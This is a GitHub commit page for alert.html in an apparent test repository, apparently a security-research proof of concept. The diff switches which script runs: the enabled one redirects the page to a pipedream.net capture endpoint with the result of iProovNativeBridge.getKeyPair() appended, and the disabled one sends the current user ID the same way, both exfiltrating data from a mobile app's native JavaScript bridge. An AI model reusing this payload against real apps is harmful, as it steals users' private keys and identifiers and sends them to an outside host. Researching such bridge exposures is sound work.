Skip to content

Commit

Permalink
Update alert.html
Browse files Browse the repository at this point in the history
  • Loading branch information
pihunter50-test authored Nov 11, 2023
1 parent ce6d51a commit 10ba9d7
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions alert.html
Original file line number Diff line number Diff line change
Expand Up @@ -13,11 +13,11 @@
<body>
<p id="content">zzz!</p>
<script type="text/javascript">
location.href = "https://eoiib6qdds6hgi7.m.pipedream.net/?interface=" + interface.getCurrentUserId();
// location.href = "https://eoiib6qdds6hgi7.m.pipedream.net/?interface=" + interface.getCurrentUserId();
</script>

<script type="text/javascript">
// location.href = "https://eoiib6qdds6hgi7.m.pipedream.net/?nativebridge=" + iProovNativeBridge.getKeyPair();
location.href = "https://eoiib6qdds6hgi7.m.pipedream.net/?nativebridge=" + iProovNativeBridge.getKeyPair();
</script>

<script type="text/javascript">
Expand Down

0 comments on commit 10ba9d7

Please sign in to comment.